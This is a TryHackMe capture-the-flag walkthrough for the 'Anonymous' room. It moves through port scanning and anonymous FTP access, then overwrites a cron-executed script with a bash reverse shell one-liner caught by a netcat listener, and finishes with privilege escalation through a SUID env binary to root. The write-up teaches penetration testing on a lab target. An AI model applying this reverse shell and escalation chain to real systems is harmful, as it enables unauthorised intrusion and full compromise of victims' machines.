TryHackMe|Anonymous WriteUp\Walkthrough (English)

Anonymous

Room link: https://tryhackme.com/room/anonymous

• First you will do an nmap scan on the whole system’s ports sudo nmap -p- IP. From this scan, you will be able to answer question 1.
• Then do another nmap scan on the 4 ports you discovered from the latter scan sudo nmap -sV -p 21,22,139,445 IP. Then you will be able to answer questions 2,3.
• sudo nmap -p445 IP --script smb-enum-shares will reveal the answer of question 4.
• Now we need to get access to the target system. From what we have we will try to get access to the system via smb, ftp, or ssh. First, we will try to sign to ftp anonymously ftp IP and indeed it worked. We have a folder called scripts. From there we have 3 files. Download the 3 files into your system using get.
• After looking into the files. It is shown that clean.sh is a script that deletes all files in /tmp and then gives feedback that gets stored in the removed_files.log. And for the to_do.txt, it is just a note that there is no need for it.
• We can notice that the log file contents increase over time, which means that the script gets executed frequently. This makes us assume that it is run by Cron. The permissions of this file allow us to edit it. so, we will benefit by this by executing one-liner reverse shell bash -i >& /dev/tcp/IP/4242 0>&1. vim clean.sh then paste the one-liner reverse shell on it with the #!/bin/bash added at the top of the file. Then upload it to the ftp server with put.
  
• For the reverse shell to work we need to set up a listener nc -nlvp 4242, make sure you specify the same port as the one on the one-liner. After some time you will receive a shell from the target machine. At the home directory, you will get the first flag✨.
• Now, we need to get the root flag. To do this, we need to have root privileges. If you look at the cron jobs nothing is interesting. Also sudo -l requires a password which we don’t have. (Note: when you first try to run sudo -l it will not run with you because it needs a terminal session, to spawn it python -c 'import pty; pty.spawn("/bin/bash")').
• Another type of files that usually used in privilege escalation when misconfigured is setuid files. To search for setuid in a system find / -perm -4000 2>/dev/null. /dev/null is a virtual device to which you can write anything. So, 2> /dev/null means that, redirect the error output from this command to /dev/null.
• There are quite a lot of binaries that have the suid bit set.  Browse to https://gtfobins.github.io/  website to identify which binaries and their respective commands to use for privilege escalation. After going through the list of identified binaries most (like mount etc.) of them required sudo (and password which we don’t have). The only option that does not require sudo was “/usr/bin/env”.
• To use env you only need to execute the second line, as the first line creates a local SUID copy of the binary which we already have. Now, cd /usr/bin then ./env /bin/sh -p instantly you will get a root shell. cd /root and retrieve the root flag ✨.